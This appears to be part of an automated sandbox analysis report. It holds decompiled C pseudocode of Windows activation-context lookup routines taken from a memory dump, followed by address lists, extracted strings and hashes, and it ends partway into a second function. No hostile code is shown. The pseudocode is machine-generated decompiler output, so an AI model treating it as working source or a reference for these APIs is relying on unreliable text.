                                                                            			E1D7EA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                            				signed int _v8;
                                                                            				char _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr _v20;
                                                                            				signed char _v24;
                                                                            				intOrPtr _v28;
                                                                            				char _v36;
                                                                            				char _v40;
                                                                            				intOrPtr _v44;
                                                                            				char _v48;
                                                                            				intOrPtr _v52;
                                                                            				char _v56;
                                                                            				signed int _v60;
                                                                            				char _v64;
                                                                            				intOrPtr _v68;
                                                                            				void* _v72;
                                                                            				void* _v76;
                                                                            				void* _v80;
                                                                            				void* _v84;
                                                                            				void* _v85;
                                                                            				void* _v88;
                                                                            				void* _v96;
                                                                            				void* _v109;
                                                                            				intOrPtr _t128;
                                                                            				void* _t129;
                                                                            				intOrPtr* _t130;
                                                                            				intOrPtr _t135;
                                                                            				void* _t136;
                                                                            				intOrPtr _t145;
                                                                            				intOrPtr _t151;
                                                                            				intOrPtr* _t164;
                                                                            				intOrPtr _t165;
                                                                            				signed int _t166;
                                                                            				intOrPtr _t172;
                                                                            				intOrPtr _t173;
                                                                            				intOrPtr _t176;
                                                                            				signed int _t177;
                                                                            				intOrPtr _t178;
                                                                            				intOrPtr _t181;
                                                                            				void* _t190;
                                                                            				intOrPtr* _t191;
                                                                            				intOrPtr _t201;
                                                                            				signed int _t202;
                                                                            				void* _t203;
                                                                            				signed char _t213;
                                                                            				intOrPtr _t214;
                                                                            				intOrPtr _t217;
                                                                            				signed int _t219;
                                                                            				signed int _t224;
                                                                            				intOrPtr _t228;
                                                                            				intOrPtr _t229;
                                                                            				signed int _t234;
                                                                            				void* _t236;
                                                                            				signed int _t240;
                                                                            				void* _t242;
                                                                            
                                                                            				_t178 =  *[fs:0x18];
                                                                            				_t242 = (_t240 & 0xfffffff8) - 0x3c;
                                                                            				_t128 =  *((intOrPtr*)(_t178 + 0x30));
                                                                            				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
                                                                            					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						_t129 = 0xc0150001;
                                                                            						goto L33;
                                                                            					}
                                                                            				} else {
                                                                            					L1:
                                                                            					_v48 = 0;
                                                                            					_v36 = 0xffffffff;
                                                                            					_v40 = 0;
                                                                            					if(_a16 == 0) {
                                                                            						L83:
                                                                            						_t129 = 0xc000000d;
                                                                            						goto L33;
                                                                            					} else {
                                                                            						_t213 = _a4;
                                                                            						if((_t213 & 0xfffffff8) != 0) {
                                                                            							goto L83;
                                                                            						} else {
                                                                            							_t130 = _a20;
                                                                            							if((_t213 & 0x00000007) == 0) {
                                                                            								if(_t130 != 0) {
                                                                            									goto L5;
                                                                            								} else {
                                                                            									goto L6;
                                                                            								}
                                                                            							} else {
                                                                            								if(_t130 == 0) {
                                                                            									goto L83;
                                                                            								} else {
                                                                            									L5:
                                                                            									if( *_t130 < 0x24) {
                                                                            										goto L83;
                                                                            									} else {
                                                                            										L6:
                                                                            										if((_t213 & 0x00000002) == 0) {
                                                                            											L9:
                                                                            											if((_t213 & 0x00000004) != 0) {
                                                                            												if(_t130 + 0x40 <=  *_t130 + _t130) {
                                                                            													goto L10;
                                                                            												} else {
                                                                            													_push(0xc000000d);
                                                                            													_push("RtlpFindActivationContextSection_CheckParameters");
                                                                            													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                            													goto L82;
                                                                            												}
                                                                            											} else {
                                                                            												L10:
                                                                            												_t233 = _a8;
                                                                            												_v24 = _t213;
                                                                            												_t214 =  *[fs:0x18];
                                                                            												_v16 = _a12;
                                                                            												_v12 = 0;
                                                                            												_t172 = _v12;
                                                                            												_t181 =  *((intOrPtr*)(_t214 + 0x30));
                                                                            												_v28 = 0x18;
                                                                            												_v8 = 0;
                                                                            												_v20 = _a8;
                                                                            												_v60 = 0;
                                                                            												_v52 = _t214;
                                                                            												_v44 = _t181;
                                                                            												while(1) {
                                                                            													_t135 = _t172;
                                                                            													if(_t135 != 0) {
                                                                            														goto L34;
                                                                            													}
                                                                            													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
                                                                            													if(_t164 == 0) {
                                                                            														L14:
                                                                            														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
                                                                            														_v60 = 0;
                                                                            														if(_t228 == 0) {
                                                                            															L36:
                                                                            															_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                            															_v60 = 0xfffffffc;
                                                                            															if(_t228 == 0) {
                                                                            																L87:
                                                                            																if(_t172 <= 3) {
                                                                            																	goto L16;
                                                                            																} else {
                                                                            																	_t129 = 0xc00000e5;
                                                                            																	goto L90;
                                                                            																}
                                                                            															} else {
                                                                            																_t172 = 3;
                                                                            																_v12 = 3;
                                                                            																goto L16;
                                                                            															}
                                                                            														} else {
                                                                            															_t172 = 2;
                                                                            															_v12 = 2;
                                                                            															goto L16;
                                                                            														}
                                                                            													} else {
                                                                            														_t165 =  *_t164;
                                                                            														if(_t165 != 0) {
                                                                            															_t166 =  *((intOrPtr*)(_t165 + 4));
                                                                            															_v60 = _t166;
                                                                            															if(_t166 != 0) {
                                                                            																if(_t166 == 0xfffffffc) {
                                                                            																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                            																	goto L56;
                                                                            																} else {
                                                                            																	if(_t166 == 0xfffffffd) {
                                                                            																		_t228 = "Actx ";
                                                                            																		goto L57;
                                                                            																	} else {
                                                                            																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
                                                                            																		goto L56;
                                                                            																	}
                                                                            																}
                                                                            															} else {
                                                                            																L56:
                                                                            																if(_t228 == 0) {
                                                                            																	goto L14;
                                                                            																} else {
                                                                            																	L57:
                                                                            																	_t172 = 1;
                                                                            																	_v12 = 1;
                                                                            																	L16:
                                                                            																	if(_t228 == 0) {
                                                                            																		_t129 = 0xc0150001;
                                                                            																		L90:
                                                                            																		_t234 = 0;
                                                                            																		goto L91;
                                                                            																	} else {
                                                                            																		_t129 = E1D7EA600(_t228, _t233, _a12,  &_v56,  &_v48);
                                                                            																		if(_t129 < 0) {
                                                                            																			_t234 = 0;
                                                                            																			if(_t129 != 0xc0150001 || _t172 == 3) {
                                                                            																				goto L19;
                                                                            																			} else {
                                                                            																				_t181 = _v44;
                                                                            																				_t214 = _v52;
                                                                            																				_t233 = _a8;
                                                                            																				continue;
                                                                            																			}
                                                                            																		} else {
                                                                            																			_t224 = _v60;
                                                                            																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
                                                                            																			asm("sbb esi, esi");
                                                                            																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
                                                                            																			_t129 = 0;
                                                                            																			L19:
                                                                            																			if(_t129 < 0) {
                                                                            																				L91:
                                                                            																				if(_t129 < 0) {
                                                                            																					goto L33;
                                                                            																				} else {
                                                                            																					goto L20;
                                                                            																				}
                                                                            																			} else {
                                                                            																				L20:
                                                                            																				_t173 = _v48;
                                                                            																				if(_t173 < 0x2c) {
                                                                            																					L110:
                                                                            																					_t138 = _v56;
                                                                            																					goto L111;
                                                                            																				} else {
                                                                            																					_t229 = _a20;
                                                                            																					while(1) {
                                                                            																						L22:
                                                                            																						_t138 = _v56;
                                                                            																						if( *_v56 != 0x64487353) {
                                                                            																							break;
                                                                            																						}
                                                                            																						_t242 = _t242 - 8;
                                                                            																						_t129 = E1D7EA760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
                                                                            																						if(_t129 >= 0) {
                                                                            																							_t83 = _t234 - 1; // -1
                                                                            																							if((_t83 | 0x00000007) != 0xffffffff) {
                                                                            																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
                                                                            																								_v40 = _t145;
                                                                            																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
                                                                            																									 *((char*)(_t242 + 0xf)) = 0;
                                                                            																									 *0x1d8c91e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
                                                                            																									_v40();
                                                                            																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
                                                                            																									if( *((char*)(_t242 + 0xf)) != 0) {
                                                                            																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
                                                                            																									}
                                                                            																								}
                                                                            																							}
                                                                            																							if(_t229 == 0) {
                                                                            																								L67:
                                                                            																								return 0;
                                                                            																							} else {
                                                                            																								_t129 = E1D7D4428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
                                                                            																								if(_t129 < 0) {
                                                                            																									goto L33;
                                                                            																								} else {
                                                                            																									goto L67;
                                                                            																								}
                                                                            																							}
                                                                            																						} else {
                                                                            																							if(_t129 != 0xc0150008) {
                                                                            																								L33:
                                                                            																								return _t129;
                                                                            																							} else {
                                                                            																								_t217 =  *[fs:0x18];
                                                                            																								_t234 = 0;
                                                                            																								_v68 = 0;
                                                                            																								_v40 = _t217;
                                                                            																								_v60 = 0;
                                                                            																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
                                                                            																								_t176 = _v20;
                                                                            																								L26:
                                                                            																								while(1) {
                                                                            																									if(_t176 <= 2) {
                                                                            																										_t190 = _t176 - _t234;
                                                                            																										if(_t190 == 0) {
                                                                            																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
                                                                            																											if(_t191 == 0) {
                                                                            																												goto L68;
                                                                            																											} else {
                                                                            																												_t201 =  *_t191;
                                                                            																												if(_t201 == 0) {
                                                                            																													goto L68;
                                                                            																												} else {
                                                                            																													_t202 =  *((intOrPtr*)(_t201 + 4));
                                                                            																													_v60 = _t202;
                                                                            																													if(_t202 == 0) {
                                                                            																														L102:
                                                                            																														if(_t151 == 0) {
                                                                            																															goto L68;
                                                                            																														} else {
                                                                            																															goto L103;
                                                                            																														}
                                                                            																													} else {
                                                                            																														if(_t202 != 0xfffffffc) {
                                                                            																															if(_t202 != 0xfffffffd) {
                                                                            																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
                                                                            																																goto L101;
                                                                            																															} else {
                                                                            																																_t151 = "Actx ";
                                                                            																																_v68 = _t151;
                                                                            																																L103:
                                                                            																																_t176 = 1;
                                                                            																																_v20 = 1;
                                                                            																																goto L28;
                                                                            																															}
                                                                            																														} else {
                                                                            																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                            																															L101:
                                                                            																															_v68 = _t151;
                                                                            																															goto L102;
                                                                            																														}
                                                                            																													}
                                                                            																												}
                                                                            																											}
                                                                            																										} else {
                                                                            																											_t203 = _t190 - 1;
                                                                            																											if(_t203 == 0) {
                                                                            																												L68:
                                                                            																												_v60 = 0;
                                                                            																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
                                                                            																												_v68 = _t151;
                                                                            																												if(_t151 == 0) {
                                                                            																													goto L44;
                                                                            																												} else {
                                                                            																													_t176 = 2;
                                                                            																													_v20 = 2;
                                                                            																													goto L28;
                                                                            																												}
                                                                            																											} else {
                                                                            																												if(_t203 != 1) {
                                                                            																													goto L27;
                                                                            																												} else {
                                                                            																													L44:
                                                                            																													_v60 = 0xfffffffc;
                                                                            																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                            																													_v68 = _t151;
                                                                            																													if(_t151 == 0) {
                                                                            																														goto L27;
                                                                            																													} else {
                                                                            																														_t176 = 3;
                                                                            																														_v20 = 3;
                                                                            																														goto L28;
                                                                            																													}
                                                                            																												}
                                                                            																											}
                                                                            																										}
                                                                            																									} else {
                                                                            																										L27:
                                                                            																										if(_t176 > 3) {
                                                                            																											_t129 = 0xc00000e5;
                                                                            																											goto L30;
                                                                            																										} else {
                                                                            																											L28:
                                                                            																											if(_t151 != 0) {
                                                                            																												_t129 = E1D7EA600(_t151, _a8, _a12,  &_v64,  &_v56);
                                                                            																												if(_t129 < 0) {
                                                                            																													_t219 = 0;
                                                                            																													if(_t129 != 0xc0150001 || _t176 == 3) {
                                                                            																														goto L48;
                                                                            																													} else {
                                                                            																														_t151 = _v68;
                                                                            																														_t217 = _v40;
                                                                            																														continue;
                                                                            																													}
                                                                            																												} else {
                                                                            																													_t177 = _v60;
                                                                            																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
                                                                            																													asm("sbb edx, edx");
                                                                            																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
                                                                            																													_t129 = 0;
                                                                            																													L48:
                                                                            																													if(_t129 < 0) {
                                                                            																														goto L31;
                                                                            																													} else {
                                                                            																														if(_t219 != 0) {
                                                                            																															_t125 = _t219 - 1; // -1
                                                                            																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
                                                                            																																while(1) {
                                                                            																																	_t236 =  *_t219;
                                                                            																																	if(_t236 == 0x7fffffff) {
                                                                            																																		goto L50;
                                                                            																																	}
                                                                            																																	asm("lock cmpxchg [edx], ecx");
                                                                            																																	if(_t236 != _t236) {
                                                                            																																		continue;
                                                                            																																	} else {
                                                                            																																		goto L50;
                                                                            																																	}
                                                                            																																	goto L112;
                                                                            																																}
                                                                            																															}
                                                                            																														}
                                                                            																														L50:
                                                                            																														_t234 = _t219;
                                                                            																														goto L51;
                                                                            																													}
                                                                            																												}
                                                                            																											} else {
                                                                            																												_t129 = 0xc0150001;
                                                                            																												L30:
                                                                            																												if(_t129 >= 0) {
                                                                            																													L51:
                                                                            																													_t173 = _v56;
                                                                            																													if(_t173 >= 0x2c) {
                                                                            																														goto L22;
                                                                            																													} else {
                                                                            																														goto L110;
                                                                            																													}
                                                                            																												} else {
                                                                            																													L31:
                                                                            																													if(_t129 == 0xc0150001) {
                                                                            																														_t129 = 0xc0150008;
                                                                            																													}
                                                                            																													goto L33;
                                                                            																												}
                                                                            																											}
                                                                            																										}
                                                                            																									}
                                                                            																									goto L112;
                                                                            																								}
                                                                            																							}
                                                                            																						}
                                                                            																						goto L112;
                                                                            																					}
                                                                            																					L111:
                                                                            																					_push(_t173);
                                                                            																					E1D85EF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
                                                                            																					_t129 = 0xc0150003;
                                                                            																					goto L33;
                                                                            																				}
                                                                            																			}
                                                                            																		}
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														} else {
                                                                            															goto L14;
                                                                            														}
                                                                            													}
                                                                            													goto L112;
                                                                            													L34:
                                                                            													_t136 = _t135 - 1;
                                                                            													if(_t136 == 0) {
                                                                            														goto L14;
                                                                            													} else {
                                                                            														if(_t136 != 1) {
                                                                            															goto L87;
                                                                            														} else {
                                                                            															goto L36;
                                                                            														}
                                                                            													}
                                                                            													goto L112;
                                                                            												}
                                                                            											}
                                                                            										} else {
                                                                            											if(_t130 + 0x2c >  *_t130 + _t130) {
                                                                            												_push(0xc000000d);
                                                                            												_push("RtlpFindActivationContextSection_CheckParameters");
                                                                            												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                            												L82:
                                                                            												_push(0);
                                                                            												_push(0x33);
                                                                            												E1D85EF10();
                                                                            												goto L83;
                                                                            											} else {
                                                                            												_t130 = _a20;
                                                                            												goto L9;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L112:
                                                                            			}
                                                                            0x1d7ea203
                                                                            0x1d7ea208
                                                                            0x1d7ea20b
                                                                            0x1d7ea20f
                                                                            0x1d7ea216
                                                                            0x1d7ea21c
                                                                            0x1d7ea224
                                                                            0x1d7ea228
                                                                            0x1d7ea22b
                                                                            0x1d7ea233
                                                                            0x1d7ea23b
                                                                            0x1d7ea23f
                                                                            0x1d7ea243
                                                                            0x1d7ea247
                                                                            0x1d7ea250
                                                                            0x1d7ea252
                                                                            0x1d7ea255
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea25b
                                                                            0x1d7ea263
                                                                            0x1d7ea26f
                                                                            0x1d7ea26f
                                                                            0x1d7ea277
                                                                            0x1d7ea27d
                                                                            0x1d7ea3ae
                                                                            0x1d7ea3ae
                                                                            0x1d7ea3b4
                                                                            0x1d7ea3be
                                                                            0x1d837823
                                                                            0x1d837826
                                                                            0x00000000
                                                                            0x1d83782c
                                                                            0x1d83782c
                                                                            0x00000000
                                                                            0x1d83782c
                                                                            0x1d7ea3c4
                                                                            0x1d7ea3c4
                                                                            0x1d7ea3c9
                                                                            0x00000000
                                                                            0x1d7ea3c9
                                                                            0x1d7ea283
                                                                            0x1d7ea283
                                                                            0x1d7ea288
                                                                            0x00000000
                                                                            0x1d7ea288
                                                                            0x1d7ea265
                                                                            0x1d7ea265
                                                                            0x1d7ea269
                                                                            0x1d7ea4bf
                                                                            0x1d7ea4c2
                                                                            0x1d7ea4c8
                                                                            0x1d7ea4e3
                                                                            0x1d83780e
                                                                            0x00000000
                                                                            0x1d7ea4e9
                                                                            0x1d7ea4ec
                                                                            0x1d837819
                                                                            0x00000000
                                                                            0x1d7ea4f2
                                                                            0x1d7ea4f2
                                                                            0x00000000
                                                                            0x1d7ea4f2
                                                                            0x1d7ea4ec
                                                                            0x1d7ea4ca
                                                                            0x1d7ea4ca
                                                                            0x1d7ea4cc
                                                                            0x00000000
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d2
                                                                            0x1d7ea4d7
                                                                            0x1d7ea28c
                                                                            0x1d7ea28e
                                                                            0x1d837833
                                                                            0x1d837838
                                                                            0x1d837838
                                                                            0x00000000
                                                                            0x1d7ea294
                                                                            0x1d7ea2a5
                                                                            0x1d7ea2ac
                                                                            0x1d7ea3d2
                                                                            0x1d7ea3d9
                                                                            0x00000000
                                                                            0x1d7ea3e8
                                                                            0x1d7ea3e8
                                                                            0x1d7ea3ec
                                                                            0x1d7ea3f0
                                                                            0x00000000
                                                                            0x1d7ea3f0
                                                                            0x1d7ea2b2
                                                                            0x1d7ea2b2
                                                                            0x1d7ea2d2
                                                                            0x1d7ea2d6
                                                                            0x1d7ea2d8
                                                                            0x1d7ea2da
                                                                            0x1d7ea2dc
                                                                            0x1d7ea2de
                                                                            0x1d83783a
                                                                            0x1d83783c
                                                                            0x00000000
                                                                            0x1d837842
                                                                            0x00000000
                                                                            0x1d837842
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2e4
                                                                            0x1d7ea2eb
                                                                            0x1d8378ed
                                                                            0x1d8378ed
                                                                            0x00000000
                                                                            0x1d7ea2f1
                                                                            0x1d7ea2f1
                                                                            0x1d7ea300
                                                                            0x1d7ea300
                                                                            0x1d7ea300
                                                                            0x1d7ea30a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea310
                                                                            0x1d7ea325
                                                                            0x1d7ea32c
                                                                            0x1d7ea4f7
                                                                            0x1d7ea500
                                                                            0x1d7ea502
                                                                            0x1d7ea505
                                                                            0x1d7ea50b
                                                                            0x1d7ea5a5
                                                                            0x1d7ea5b8
                                                                            0x1d7ea5be
                                                                            0x1d7ea5c2
                                                                            0x1d7ea5cb
                                                                            0x1d7ea5d1
                                                                            0x1d7ea5d1
                                                                            0x1d7ea5cb
                                                                            0x1d7ea50b
                                                                            0x1d7ea523
                                                                            0x1d7ea549
                                                                            0x1d7ea551
                                                                            0x1d7ea525
                                                                            0x1d7ea53c
                                                                            0x1d7ea543
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ea543
                                                                            0x1d7ea332
                                                                            0x1d7ea337
                                                                            0x1d7ea393
                                                                            0x1d7ea399
                                                                            0x1d7ea339
                                                                            0x1d7ea339
                                                                            0x1d7ea342
                                                                            0x1d7ea344
                                                                            0x1d7ea34a
                                                                            0x1d7ea34e
                                                                            0x1d7ea355
                                                                            0x1d7ea359
                                                                            0x00000000
                                                                            0x1d7ea360
                                                                            0x1d7ea363
                                                                            0x1d7ea3fa
                                                                            0x1d7ea3fc
                                                                            0x1d837847
                                                                            0x1d83784f
                                                                            0x00000000
                                                                            0x1d837855
                                                                            0x1d837855
                                                                            0x1d837859
                                                                            0x00000000
                                                                            0x1d83785f
                                                                            0x1d83785f
                                                                            0x1d837862
                                                                            0x1d837868
                                                                            0x1d837892
                                                                            0x1d837894
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83786a
                                                                            0x1d83786d
                                                                            0x1d83787e
                                                                            0x1d83788b
                                                                            0x00000000
                                                                            0x1d837880
                                                                            0x1d837880
                                                                            0x1d837885
                                                                            0x1d83789a
                                                                            0x1d83789a
                                                                            0x1d83789f
                                                                            0x00000000
                                                                            0x1d83789f
                                                                            0x1d83786f
                                                                            0x1d837873
                                                                            0x1d83788e
                                                                            0x1d83788e
                                                                            0x00000000
                                                                            0x1d83788e
                                                                            0x1d83786d
                                                                            0x1d837868
                                                                            0x1d837859
                                                                            0x1d7ea402
                                                                            0x1d7ea402
                                                                            0x1d7ea405
                                                                            0x1d7ea554
                                                                            0x1d7ea556
                                                                            0x1d7ea55e
                                                                            0x1d7ea564
                                                                            0x1d7ea56a
                                                                            0x00000000
                                                                            0x1d7ea570
                                                                            0x1d7ea570
                                                                            0x1d7ea575
                                                                            0x00000000
                                                                            0x1d7ea575
                                                                            0x1d7ea40b
                                                                            0x1d7ea40e
                                                                            0x00000000
                                                                            0x1d7ea414
                                                                            0x1d7ea414
                                                                            0x1d7ea418
                                                                            0x1d7ea420
                                                                            0x1d7ea426
                                                                            0x1d7ea42c
                                                                            0x00000000
                                                                            0x1d7ea432
                                                                            0x1d7ea432
                                                                            0x1d7ea437
                                                                            0x00000000
                                                                            0x1d7ea437
                                                                            0x1d7ea42c
                                                                            0x1d7ea40e
                                                                            0x1d7ea405
                                                                            0x1d7ea369
                                                                            0x1d7ea369
                                                                            0x1d7ea36c
                                                                            0x1d8378e3
                                                                            0x00000000
                                                                            0x1d7ea372
                                                                            0x1d7ea372
                                                                            0x1d7ea374
                                                                            0x1d7ea452
                                                                            0x1d7ea459
                                                                            0x1d7ea57e
                                                                            0x1d7ea585
                                                                            0x00000000
                                                                            0x1d7ea594
                                                                            0x1d7ea594
                                                                            0x1d7ea598
                                                                            0x00000000
                                                                            0x1d7ea598
                                                                            0x1d7ea45f
                                                                            0x1d7ea45f
                                                                            0x1d7ea47f
                                                                            0x1d7ea483
                                                                            0x1d7ea485
                                                                            0x1d7ea487
                                                                            0x1d7ea489
                                                                            0x1d7ea48b
                                                                            0x00000000
                                                                            0x1d7ea491
                                                                            0x1d7ea493
                                                                            0x1d8378a8
                                                                            0x1d8378b1
                                                                            0x1d8378c3
                                                                            0x1d8378c3
                                                                            0x1d8378cb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8378d6
                                                                            0x1d8378dc
                                                                            0x00000000
                                                                            0x1d8378de
                                                                            0x00000000
                                                                            0x1d8378de
                                                                            0x00000000
                                                                            0x1d8378dc
                                                                            0x1d8378c3
                                                                            0x1d8378b1
                                                                            0x1d7ea499
                                                                            0x1d7ea499
                                                                            0x00000000
                                                                            0x1d7ea499
                                                                            0x1d7ea48b
                                                                            0x1d7ea37a
                                                                            0x1d7ea37a
                                                                            0x1d7ea37f
                                                                            0x1d7ea381
                                                                            0x1d7ea49b
                                                                            0x1d7ea49b
                                                                            0x1d7ea4a2
                                                                            0x00000000
                                                                            0x1d7ea4a8
                                                                            0x00000000
                                                                            0x1d7ea4a8
                                                                            0x1d7ea387
                                                                            0x1d7ea387
                                                                            0x1d7ea38c
                                                                            0x1d7ea38e
                                                                            0x1d7ea38e
                                                                            0x00000000
                                                                            0x1d7ea38c
                                                                            0x1d7ea381
                                                                            0x1d7ea374
                                                                            0x1d7ea36c
                                                                            0x00000000
                                                                            0x1d7ea363
                                                                            0x1d7ea360
                                                                            0x1d7ea337
                                                                            0x00000000
                                                                            0x1d7ea32c
                                                                            0x1d8378f1
                                                                            0x1d8378f1
                                                                            0x1d8378fc
                                                                            0x1d837904
                                                                            0x00000000
                                                                            0x1d837904
                                                                            0x1d7ea2eb
                                                                            0x1d7ea2de
                                                                            0x1d7ea2ac

                                                                            Strings
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8377E2
                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8378F3
                                                                            • SsHd, xrefs: 1D7EA304
                                                                            • Actx , xrefs: 1D837819, 1D837880
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8377DD, 1D837802
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D837807
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                            • API String ID: 0-1988757188
                                                                            • Opcode ID: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                            • Instruction ID: d0e2d8bc06ab8f1cdbcf68e32d72f4c4dea9f1ce275953de1394022c3ed59493
                                                                            • Opcode Fuzzy Hash: da5954cc47412dd18720f4d859fbb4d8e5b9d9adbe658d53f3386a7e17dba879
                                                                            • Instruction Fuzzy Hash: B6E1D1706043429FD715EE28C884B6BB7E1BF892B4F114A2EF969CB291D731D845CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
                                                                            			E1D7ED690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
                                                                            				signed int _v8;
                                                                            				intOrPtr _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				char _v36;
                                                                            				signed int _v40;
                                                                            				char _v44;
                                                                            				intOrPtr _v48;
                                                                            				signed int _v52;
                                                                            				char _v56;
                                                                            				char _v60;
                                                                            				signed int _v64;
                                                                            				intOrPtr _v68;
                                                                            				signed int _v72;
                                                                            				char _v76;
                                                                            				signed int _v80;
                                                                            				signed int* _v84;
                                                                            				char _v88;
                                                                            				signed int _v92;
                                                                            				char _v93;
                                                                            				signed int _v104;
                                                                            				char _v117;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t150;
                                                                            				char _t158;
                                                                            				intOrPtr _t160;
                                                                            				intOrPtr _t163;
                                                                            				intOrPtr* _t164;
                                                                            				intOrPtr _t170;
                                                                            				signed int _t171;
                                                                            				void* _t172;
                                                                            				signed int _t195;
                                                                            				intOrPtr* _t201;
                                                                            				signed int _t205;
                                                                            				intOrPtr* _t209;
                                                                            				void* _t210;
                                                                            				intOrPtr _t211;
                                                                            				intOrPtr _t213;
                                                                            				signed int _t214;
                                                                            				intOrPtr* _t215;
                                                                            				intOrPtr _t217;
                                                                            				intOrPtr _t225;
                                                                            				intOrPtr _t227;
                                                                            				intOrPtr _t228;
                                                                            				void* _t233;
                                                                            				intOrPtr* _t234;
                                                                            				signed int _t242;
                                                                            				void* _t246;
                                                                            				signed int _t247;
                                                                            				signed int _t252;
                                                                            				void* _t253;
                                                                            				intOrPtr* _t254;
                                                                            				intOrPtr _t255;
                                                                            				signed int _t256;
                                                                            				signed int _t258;
                                                                            
                                                                            				_t258 = (_t256 & 0xfffffff8) - 0x5c;
                                                                            				_v8 =  *0x1d8cb370 ^ _t258;
                                                                            				_t217 =  *[fs:0x18];
                                                                            				_t241 = _a16;
                                                                            				_t209 = _a20;
                                                                            				_t150 =  *((intOrPtr*)(_t217 + 0x30));
                                                                            				_t252 = _a8;
                                                                            				_v84 = _t241;
                                                                            				_v80 = _t209;
                                                                            				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
                                                                            					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						_t151 = 0xc0150001;
                                                                            						L24:
                                                                            						_pop(_t246);
                                                                            						_pop(_t253);
                                                                            						_pop(_t210);
                                                                            						return E1D814B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				_v88 = 0;
                                                                            				if(_t241 == 0) {
                                                                            					L49:
                                                                            					_t151 = 0xc000000d;
                                                                            					goto L24;
                                                                            				}
                                                                            				_t241 = _a4;
                                                                            				if((_t241 & 0xfffffff8) != 0) {
                                                                            					goto L49;
                                                                            				}
                                                                            				if((_t241 & 0x00000007) == 0) {
